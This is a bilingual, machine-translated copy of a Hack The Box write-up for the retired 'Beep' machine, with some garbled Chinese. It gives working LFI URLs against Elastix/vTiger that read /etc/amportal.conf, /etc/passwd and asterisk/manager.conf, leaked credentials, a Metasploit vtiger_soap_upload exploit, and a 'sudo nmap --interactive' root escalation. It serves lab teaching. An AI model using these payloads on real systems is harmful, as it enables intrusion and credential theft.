推箱子2-向右推!
Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.
Hack The Box(HTB)是一个在线平台,可让您测试渗透测试技能。 它包含一些不断更新的挑战。 其中一些模拟现实世界的场景,而另一些则更倾向于CTF的挑战风格。
Note. Only write-ups of retired HTB machines are allowed.
注意 。 只允许注销HTB机器。
Beep is described as having a very large list of running services, which can make it a bit challenging to find the correct entry method. The machine can be a little overwhelming for some as there are many potential attack vectors
Beep被描述为具有大量正在运行的服务,这可能会使查找正确的输入方法变得有些挑战。 由于存在许多潜在的攻击媒介,因此该机器可能有些不堪一击
We will use the following tools to pawn the box on a Kali Linux box
我们将使用以下工具将盒子当成Kali Linux盒子
第1步-扫描网络 (Step 1 - Scanning the network)
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
开发机器之前的第一步是进行一些扫描和侦察。
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.
这是最重要的部分之一,因为它将决定您以后可以尝试利用的内容。 最好在该阶段花费更多时间以获取尽可能多的信息。
I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
我将使用Nmap (网络映射器),这是一个免费的开源实用程序,用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务,它们正在运行的操作系统,使用的数据包过滤器/防火墙的类型以及许多其他特征。
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
此工具可以使用许多命令来扫描网络。 如果您想了解更多信息,可以在这里查看文档。
I use the following command to get a basic idea of what we are scanning
我使用以下命令来了解我们正在扫描的内容
nmap -sV -O -F --version-light 10.10.10.7-sV: Probe open ports to determine service/version info
-sV:探测打开的端口以确定服务/版本信息
-O: Enable OS detection
-O:启用操作系统检测
-F: Fast mode - Scan fewer ports than the default scan
-F:快速模式-扫描的端口少于默认扫描
--version-light: Limit to most likely probes (intensity 2)
--version-light:限制为最可能的探测(强度2)
10.10.10.7: IP address of the Beep box
10.10.10。 7 :提示音框的IP地址
You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
您还可以使用Zenmap ,这是官方的Nmap Security Scanner GUI。 它是一个多平台,免费和开源的应用程序,旨在使Nmap易于初学者使用,同时为经验丰富的Nmap用户提供高级功能。
I use a different set of commands to perform an intensive scan
我使用一组不同的命令来执行密集扫描
nmap -A -v 10.10.10.7-A: Enable OS detection, version detection, script scanning, and traceroute
-A:启用操作系统检测,版本检测,脚本扫描和跟踪路由
-v: Increase verbosity level
-v:提高详细程度
10.10.10.7: IP address of the Beep box
10.10.10.7:提示框的IP地址
If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.
如果发现结果有点不堪重负,则可以移至“ 端口/主机”选项卡以仅获取打开的端口。
We can see that there are 12 open ports:
我们可以看到有12个开放端口:
Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding
端口 22 。 安全Shell(SSH),安全登录,文件传输(scp,sftp)和端口转发
Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers
端口 25 。 简单邮件传输协议(SMTP)用于邮件服务器之间的电子邮件路由
Port 80. Hypertext Transfer Protocol (HTTP). Here it's an Apache httpd 2.2.3
端口 80 。 超文本传输协议(HTTP)。 这是Apache httpd 2.2.3
Port 110. Post Office Protocol, version 3 (POP3)
端口 110 。 邮局协议,版本3(POP3)
Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC)
端口 111 。 开放网络计算远程过程调用( ONC RPC ,有时也称为Sun RPC )
Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server
端口 143 。 Internet邮件访问协议(IMAP),管理服务器上的电子邮件
Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS)
端口 443 。 TLS / SSL(HTTPS)上的超文本传输协议
Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS)
端口 993 。 TLS / SSL上的Internet消息访问协议(IMAPS)
Port 995. Post Office Protocol 3 over TLS/SSL (POP3S)
995 端口 。 TLS / SSL(POP3S)上的邮局协议3
Port 3306. MySQL database system
端口 3306 。 MySQL数据库系统
Port 4445. I2P HTTP/S proxy
端口 4445 。 I2P HTTP / S代理
Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port)
端口 10000 。 Webmin,基于Web的Unix / Linux系统管理工具(默认端口)
Nmap finds quite a long list of services. For now, Apache, which is running on ports 80 and 443, will be the primary target.
Nmap找到了很长的服务列表。 目前,运行在端口80和443上的Apache将成为主要目标。
步骤2-列举目录 (Step 2 - Enumerating the directories)
Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
仍处于扫描和侦察阶段,我现在使用DirBuster 。 DirBuster是一个多线程Java应用程序,旨在暴力破解Web /应用程序服务器上的目录和文件名。
You can launch DirBuster by typing this command on the terminal
您可以通过在终端上键入此命令来启动DirBuster
dirbusteror by searching the application
或通过搜索应用程序
The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.7. You can select a file with the list of dirs/files by clicking the Browse button
该应用程序如下所示,您可以在其中指定目标URL。 在我们的情况下,它将是https://10.10.10.7 。 您可以通过单击“浏览”按钮选择带有目录/文件列表的文件。
I use the directory-list-2.3-medium.txt for this search
我使用directory-list-2.3-medium.txt进行此搜索
DirBuster finds a huge list of directories with several content management systems and open source applications. There are several vulnerabilities that can lead to shell amongst the results.
DirBuster可以找到包含多个内容管理系统和开源应用程序的大量目录。 结果中有几个漏洞可能导致脱壳。
第3步-访问网站 (Step 3 - Visiting the website)
Let's try port 80 and visit http://10.10.10.7
让我们尝试端口80并访问http://10.10.10.7
The website is redirected to https://10.10.10.7 and we need to add a security exception to the website to continue
网站被重定向到https://10.10.10.7,我们需要向网站添加安全例外才能继续
We finally land on the website which is an Elastix Login Portal. Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialling
我们最终登陆了Elastix登录门户网站 。 Elastix是统一的通信服务器软件,它将IP PBX,电子邮件,IM,传真和协作功能集成在一起。 它具有Web界面,并包括诸如具有预测性拨号功能的呼叫中心软件之类的功能。
An IP PBX ("Internet Protocol private branch exchange") is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business
IP PBX (“ Internet协议专用小交换机”)是将电话分机连接到公用电话交换网(PSTN)并为企业提供内部通信的系统
If you want to learn more about Elastix, you can have a look here
如果您想了解有关Elastix的更多信息,可以看看 在这里
I try the default credentials, but it doesn't seem to work
我尝试使用默认凭据,但似乎不起作用
Username: admin
Password: palosantoHaving a look at the source code doesn't help either
查看源代码也无济于事
I will use Searchsploit to check if there's any known vulnerability on Elastix. Searchsploit is a command line search tool for Exploit Database
我将使用Searchsploit来检查Elastix上是否存在任何已知漏洞。 Searchsploit是漏洞数据库的命令行搜索工具
I use the following command
我使用以下命令
searchsploit elastixWe can see several vulnerabilities, but we will examine the 'graph.php' Local File Inclusion with this command
我们可以看到几个漏洞,但是我们将使用此命令检查“ graph.php”本地文件包含
searchsploit -x 37637.plWe have a summary of the exploit and the code
我们对漏洞利用和代码进行了总结
The LFI Exploit is the following
LFI漏洞利用如下
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&actionAn attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS)
攻击者可以使用本地文件包含(LFI)来欺骗Web应用程序以在Web服务器上公开或运行文件。 LFI攻击可能导致信息泄露,远程代码执行甚至跨站点脚本(XSS)
You can also check the Exploit Database to find the exploit
您还可以检查漏洞利用数据库以找到漏洞利用
You will get the same results as on the terminal. If you navigate to the 2.0 - 'graph.php' Local File Inclusion, you will have a description of the exploit
您将获得与终端上相同的结果。 如果导航到2.0-'graph.php'本地文件包含 ,则将有关于漏洞利用的描述
If you remember from step 2, the directory enumeration flagged a vTiger CRM.
如果您还记得第2步中的内容 ,则目录枚举标记为vTiger CRM 。
vTiger CRM is an integrated customer relationship management (CRM) application that can be used on the Intranet or from the Internet using a browser. It is distributed under a free license
vTiger CRM是一个集成的客户关系管理(CRM)应用程序,可以在Intranet上或使用浏览器从Internet使用。 它是根据免费许可证分发的
If you want to learn more about vTiger CRM, you can have a look here
如果您想了解有关vTiger CRM的更多信息,可以看看 在这里
You can also read more about the integration between Elastix and vTigerCRM here
您还可以在此处阅读有关Elastix和vTigerCRM之间集成的更多信息。
步骤4-尝试elastix LFI利用 (Step 4 - Trying the elastix LFI exploit)
Let's navigate to
让我们导航到
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&actionIf you can't read anything, you can prettify the file by checking the source file
如果您无法阅读任何内容,则可以通过检查源文件来美化文件
I find a password jEhdIekWmdjE
我找到密码jEhdIekWmdjE
If you remember from step 1, the nmap scan flagged port 22 as opened, let's try the newly found password on it
如果您还记得第1步中的 ,nmap扫描将端口22标记为已打开,让我们尝试在其上新找到的密码
第5步-连接到SSH (Step 5 - Connecting to SSH)
Let's connect to the SSH with the following command
让我们使用以下命令连接到SSH
ssh root@10.10.10.7I try the password and I'm in!
我尝试输入密码,然后进入!
第6步-寻找root.txt标志 (Step 6 - Looking for the root.txt flag)
I can now look for the first flag, root.txt
我现在可以查找第一个标志root.txt
I use the following command to check who am I on this machine
我使用以下命令来检查我是谁
whoamiI have root access to the machine. I got the power!
我具有对该计算机的root访问权限。 我有力量!
I use the following command to check where I am on the machine
我使用以下命令检查我在机器上的位置
pwdI'm in /root and by doing
我在/ root并通过
lsI find the root.txt file! To read the content of the file I use the command
我找到了root.txt文件! 要读取文件的内容,请使用以下命令
cat root.txtNow that we have the root flag, let's find the user flag!
现在我们有了root标志,让我们找到用户标志!
步骤7-寻找user.txt标志 (Step 7 - Looking for the user.txt flag)
I need to navigate back to the home directory by doing
我需要通过导航回到主目录
cd homeI then list all the files/folders and see there's a folder called fanis
然后,我列出所有文件/文件夹,然后看到有一个名为fanis的文件夹
I navigate to this folder with
我导航到该文件夹
cd fanisAnd when I list the files/folders, I can see the user.txt file!
当我列出文件/文件夹时,我可以看到user.txt文件!
To read the content of the file I use the command
要读取文件的内容,请使用以下命令
cat user.txtCongrats! You found both flags!
恭喜! 您找到了两个标志!
Variations for Informational findings
信息发现的变化
步骤3b-访问网站 (Step 3b - Visiting the website)
Let's navigate to
让我们导航到
https://10.10.10.7/vtigercrm/We can see the version of the application: vTiger CRM 5.1.0
我们可以看到该应用程序的版本: vTiger CRM 5.1.0
I will use Searchsploit to check if there's any known vulnerability on vTigerCRM
我将使用Searchsploit来检查vTigerCRM上是否存在任何已知漏洞
I use the following command
我使用以下命令
searchsploit vtigerWe can see several vulnerabilities. I examine the Local File Inclusion with this command
我们可以看到几个漏洞。 我使用此命令检查本地文件包含
searchsploit -x 18770.txtI have a summary of the exploit and the code
我对漏洞利用和代码进行了总结
The LFI Exploit is the following
LFI漏洞利用如下
/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00You can also check the exploit database to find the exploit
您还可以检查漏洞利用数据库以找到漏洞利用
You will get the same results on the terminal. If you navigate to the vTiger 5.1.0 - Local File Inclusion, you will have a description of the exploit
您将在终端上获得相同的结果。 如果导航到vTiger 5.1.0-包含本地文件 ,则将有关于此漏洞利用的描述
步骤4b-对vTiger Asterisk默认凭据进行更多检查 (Step 4b - Doing more recon around the vTiger Asterisk default credentials)
Let's navigate to
让我们导航到
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00If you can't read anything, you can prettify the file by checking the source file
如果您无法阅读任何内容,则可以通过检查源文件来美化文件
I also do some research on default credentials for vTiger and find some documentation around installing vTiger Asterisk Connector
我还对vTiger的默认凭据进行了一些研究,并找到了一些有关安装vTiger Asterisk Connector的文档。
If we modify the previous URL to
如果我们将先前的网址修改为
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00I navigate to this page (using source code to prettify the output)
我导航到此页面(使用源代码修饰输出)
I find a password jEhdIekWmdjE
我找到密码jEhdIekWmdjE
You can continue to Step 5 from there
您可以从那里继续执行步骤5
Variations using Metasploit, meterpreter, nmap --interactive and Burp
使用Metasploit,meterpreter,nmap --interactive和Burp的变体
步骤3c-访问网站 (Step 3c - Visiting the website)
We know that the version of the application is vTiger CRM 5.1.0
我们知道该应用程序的版本是vTiger CRM 5.1.0
We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders
我们将使用Metasploit ,它是一种渗透测试框架,可使黑客攻击变得简单。 对于许多攻击者和防御者来说,这是必不可少的工具
I launch Metasploit Framework on Kali and look for command I should use to launch the exploit
我在Kali上启动Metasploit框架 ,并寻找启动漏洞利用程序所需的命令
I find an interesting payload, number 3
我发现一个有趣的有效载荷,编号3
exploit/multi/http/vtiger_soap_uploadThis is the description of the exploit
这是漏洞利用的描述
vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.
vTiger CRM允许用户在请求SOAP服务时绕过身份验证。 另外,可以通过AddEmailAttachment SOAP服务上载任意文件。 通过结合这两个漏洞,攻击者可以上载和执行PHP代码。 此模块已在Ubuntu 10.04和Windows 2003 SP2的vTiger CRM v5.4.0上成功测试。
I use the following command for the exploit
我使用以下命令进行攻击
use exploit/multi/http/vtiger_soap_uploadI need to set up several options before launching the exploit
启动漏洞之前,我需要设置几个选项
I start by setting the RHOSTS with the following command
我首先使用以下命令设置RHOSTS
set RHOSTS 10.10.10.7/32I set the SSL and the RPORT with
我将SSL和RPORT设置为
set SSL trueand
和
set RPORT 443I run the exploit, but I need to set the correct LPORT this time with
我运行了漏洞利用程序,但是这次我需要设置正确的LPORT
set LPORT 10.10.14.10Here is a sum up of all the commands
这是所有命令的总结
I check the options
我检查选项
I run the exploit with the command
我用命令运行漏洞
runI get this error message
我收到此错误消息
I set up the proxy with the following command
我使用以下命令设置代理
set proxies http:127.0.0.1:8080I check the options again
我再次检查选项
I run the exploit but I get a new error message
我运行了漏洞利用程序,但收到了新的错误消息
I set it with this command
我用这个命令设置
set ReverseAllowProxy trueI also need to set up Burp to proxy the exploit.
我还需要设置Burp来代理漏洞利用。
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps identify vulnerabilities and verify attack vectors that are affecting web applications
Burp Suite是基于Java的Web渗透测试框架。 它已成为信息安全专业人员使用的行业标准工具套件。 Burp Suite帮助识别漏洞并验证影响Web应用程序的攻击媒介
You can learn more on the official website here
您可以在官方网站上了解更多信息
Open Burp and set the target to the website in Target > Scope > Target Scope > Include in scope > edit
打开打p并在目标>范围>目标范围>包含在范围>编辑中将目标设置为网站
I run the exploit on Metasploit and go back to Burp. I can see Burp intercepted the request
我在Metasploit上运行了漏洞利用程序,然后回到Burp 。 我可以看到Burp截获了请求
I set the Intercept option to off
我将拦截选项设置为关闭
Back on Metasploit, I finally get a Meterpreter session
回到Metasploit上 ,我终于参加了Meterpreter会议
From the Offensive Security website, we get this definition for Meterpreter
从“ 进攻性安全”网站上,我们获得了Meterpreter的定义
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一种高级的,动态可扩展的有效负载,它使用内存中的 DLL注入暂存器,并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信,并提供全面的客户端Ruby API。 它具有命令历史记录,制表符完成,通道等功能。
You can read more about Meterpreter here.
您可以在此处阅读有关Meterpreter的更多信息。
步骤4c-寻找user.txt标志 (Step 4c - Looking for the user.txt flag)
I navigate to the root directory to find the home folder. I then move to the home directory with
我导航到根目录以找到主文件夹。 然后,我使用
cd homeYou can list files/folder with
您可以使用列出文件/文件夹
ls -laI find a folder called fanis. Let's see what's inside with
我找到一个名为fanis的文件夹。 让我们看看里面有什么
cd fanisI list all files/folders and I find the user.txt flag. To read the content of the file I use the command
我列出了所有文件/文件夹,并找到了user.txt标志。 要读取文件的内容,请使用以下命令
cat user.txtNow that we have the user flag, let's find the root flag!
现在有了用户标志,让我们找到根标志!
步骤5c-寻找root.txt标志 (Step 5c - Looking for the root.txt flag)
I can't access the root folder, but I can create a shell with the command
我无法访问根文件夹,但是可以使用以下命令创建外壳
shellIf I check who I am on the machine, I get
如果我检查我在机器上的身份,我会得到
If you do
如果你这样做
sudo -lyou can see many NOPASSWD commands which can lead us to getting root
您会看到许多NOPASSWD命令,这些命令可以导致我们扎根
Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges
Nmap的较早版本(2.02至5.21)具有交互模式,该模式允许用户执行Shell命令。 由于Nmap在以root特权执行的二进制文件列表中,因此可以使用交互式控制台来以相同的特权运行shell
Let's try it with the following command
让我们用以下命令尝试一下
sudo nmap --interactiveThe following command will give an elevated shell. You can read more on the Bourne shell here
以下命令将提供高架外壳。 您可以在这里在Bourne shell上阅读更多内容
!shI check who I am on the machine, and I have root access
我检查我在机器上的身份,并且我具有root用户访问权限
I can now navigate to the root directory
我现在可以导航到根目录
I find the root.txt.txt file!
我找到了root.txt.txt文件!
To read the content of the file I use the command
要读取文件的内容,请使用以下命令
cat root.txtCongrats! You found both flags!
恭喜! 您找到了两个标志!
Please don’t hesitate to comment, ask questions or share with your friends :)
请不要犹豫,发表评论,提问或与您的朋友分享:)
You can see more of my articles here
您可以在这里看到更多我的文章
You can follow me on Twitter or on LinkedIn
And don't forget to #GetSecure, #BeSecure & #StaySecure!
并且不要忘记# GetSecure ,# BeSecure和#StaySecure !
Other Hack The Box articles
其他Hack The Box文章
翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-beep/
推箱子2-向右推!
625
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
